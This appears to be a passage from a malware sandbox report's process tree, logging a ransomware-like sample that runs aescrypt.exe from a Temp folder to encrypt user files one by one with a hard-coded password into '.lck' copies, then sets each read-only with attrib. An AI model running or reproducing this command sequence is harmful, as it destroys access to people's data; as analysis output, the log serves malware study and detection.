-
C:\Windows\system32\attrib.exeattrib +r "MergeLock.pps.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MergeSkip.exe.lck" "MergeSkip.exe"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "MergeSkip.exe.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OptimizeOpen.htm.lck" "OptimizeOpen.htm"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "OptimizeOpen.htm.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ProtectBlock.html.lck" "ProtectBlock.html"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ProtectBlock.html.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MountEdit.ex_.lck" "MountEdit.ex_"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "MountEdit.ex_.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutHide.eps.lck" "OutHide.eps"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "OutHide.eps.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReceivePop.shtml.lck" "ReceivePop.shtml"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ReceivePop.shtml.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectAdd.mpp.lck" "ConnectAdd.mpp"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ConnectAdd.mpp.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DenyApprove.odt.lck" "DenyApprove.odt"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "DenyApprove.odt.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BlockWait.rar.lck" "BlockWait.rar"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "BlockWait.rar.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "LockSave.wav.lck" "LockSave.wav"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "LockSave.wav.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InstallSet.bin.lck" "InstallSet.bin"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "InstallSet.bin.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PublishUpdate.jpe.lck" "PublishUpdate.jpe"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "PublishUpdate.jpe.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "JoinWait.pot.lck" "JoinWait.pot"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "JoinWait.pot.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "HideUnlock.nfo.lck" "HideUnlock.nfo"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "HideUnlock.nfo.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutSuspend.gif.lck" "OutSuspend.gif"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "OutSuspend.gif.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutExit.potx.lck" "OutExit.potx"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "OutExit.potx.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UnlockJoin.TS.lck" "UnlockJoin.TS"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "UnlockJoin.TS.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestoreReset.cfg.lck" "RestoreReset.cfg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RestoreReset.cfg.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DebugPop.mpeg.lck" "DebugPop.mpeg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "DebugPop.mpeg.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CheckpointSet.zip.lck" "CheckpointSet.zip"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "CheckpointSet.zip.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RestoreRegister.odt.lck" "RestoreRegister.odt"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RestoreRegister.odt.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RevokeDeny.xps.lck" "RevokeDeny.xps"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RevokeDeny.xps.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RegisterConvertFrom.wma.lck" "RegisterConvertFrom.wma"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RegisterConvertFrom.wma.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "LimitDismount.wdp.lck" "LimitDismount.wdp"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "LimitDismount.wdp.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisablePing.hta.lck" "DisablePing.hta"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "DisablePing.hta.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "PopMerge.mov.lck" "PopMerge.mov"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "PopMerge.mov.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeSave.TS.lck" "ResumeSave.TS"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ResumeSave.TS.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExpandOpen.reg.lck" "ExpandOpen.reg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ExpandOpen.reg.lck"3⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "desktop.ini.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Wallpaper.jpg.lck" "Wallpaper.jpg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "Wallpaper.jpg.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RenameTest.raw.lck" "RenameTest.raw"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "RenameTest.raw.lck"3⤵
- Modifies extensions of user files
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UninstallPush.dib.lck" "UninstallPush.dib"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "UninstallPush.dib.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompleteOpen.svgz.lck" "CompleteOpen.svgz"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "CompleteOpen.svgz.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConvertEnable.wmf.lck" "ConvertEnable.wmf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ConvertEnable.wmf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SyncOpen.png.lck" "SyncOpen.png"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "SyncOpen.png.lck"3⤵
- Modifies extensions of user files
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RequestBackup.pcx.lck" "RequestBackup.pcx"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "RequestBackup.pcx.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExportHide.bmp.lck" "ExportHide.bmp"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ExportHide.bmp.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceStop.raw.lck" "TraceStop.raw"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "TraceStop.raw.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SearchCheckpoint.gif.lck" "SearchCheckpoint.gif"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "SearchCheckpoint.gif.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeConfirm.dib.lck" "ResumeConfirm.dib"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ResumeConfirm.dib.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OpenSkip.dwg.lck" "OpenSkip.dwg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "OpenSkip.dwg.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "MeasureSend.cr2.lck" "MeasureSend.cr2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "MeasureSend.cr2.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WatchHide.tif.lck" "WatchHide.tif"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "WatchHide.tif.lck"3⤵
- Modifies extensions of user files
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CompleteEnable.dxf.lck" "CompleteEnable.dxf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "CompleteEnable.dxf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SendRestart.ico.lck" "SendRestart.ico"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "SendRestart.ico.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ClearTrace.emz.lck" "ClearTrace.emz"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ClearTrace.emz.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "SwitchRestart.tif.lck" "SwitchRestart.tif"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "SwitchRestart.tif.lck"3⤵
- Modifies extensions of user files
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "OutInitialize.crw.lck" "OutInitialize.crw"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "OutInitialize.crw.lck"3⤵
- Modifies extensions of user files
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ResumeSync.crw.lck" "ResumeSync.crw"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "ResumeSync.crw.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ExportUndo.eps.lck" "ExportUndo.eps"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ExportUndo.eps.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "InitializeConvert.tiff.lck" "InitializeConvert.tiff"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "InitializeConvert.tiff.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DisconnectPop.bmp.lck" "DisconnectPop.bmp"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "DisconnectPop.bmp.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteDisable.emf.lck" "WriteDisable.emf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "WriteDisable.emf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "CloseExpand.dxf.lck" "CloseExpand.dxf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "CloseExpand.dxf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadRegister.tiff.lck" "ReadRegister.tiff"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "ReadRegister.tiff.lck"3⤵
- Modifies extensions of user files
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ReadDismount.jpg.lck" "ReadDismount.jpg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ReadDismount.jpg.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ConnectWait.svg.lck" "ConnectWait.svg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ConnectWait.svg.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "DismountFind.emf.lck" "DismountFind.emf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "DismountFind.emf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "UpdateUnblock.svg.lck" "UpdateUnblock.svg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "UpdateUnblock.svg.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GrantFind.png.lck" "GrantFind.png"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "GrantFind.png.lck"3⤵
- Modifies extensions of user files
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceRead.dxf.lck" "TraceRead.dxf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "TraceRead.dxf.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "BackupSync.dib.lck" "BackupSync.dib"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "BackupSync.dib.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "RepairSearch.crw.lck" "RepairSearch.crw"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "RepairSearch.crw.lck"3⤵
- Modifies extensions of user files
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "GetFind.png.lck" "GetFind.png"3⤵
- Modifies extensions of user files
-
-
C:\Windows\system32\attrib.exeattrib +r "GetFind.png.lck"3⤵
- Modifies extensions of user files
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WaitGet.wmf.lck" "WaitGet.wmf"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "WaitGet.wmf.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "TraceComplete.svg.lck" "TraceComplete.svg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "TraceComplete.svg.lck"3⤵
- Views/modifies file attributes
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "WriteApprove.jpeg.lck" "WriteApprove.jpeg"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "WriteApprove.jpeg.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "ntuser.dat.LOG2.lck"3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir * /a-D /b /oS3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Everywhere.search-ms.lck" "Everywhere.search-ms"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "Everywhere.search-ms.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "Indexed.lck" "Indexed"3⤵
-
-
C:\Windows\system32\attrib.exeattrib +r "Indexed.lck"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe"C:\Users\Admin\AppData\Local\Temp\50AF.tmp\aescrypt.exe" -e -p kpviaR0Bgl7Jk1s8aKoL4Y9RMkc0HFsh -o "desktop.ini.lck" "desktop.ini"3⤵
-
-
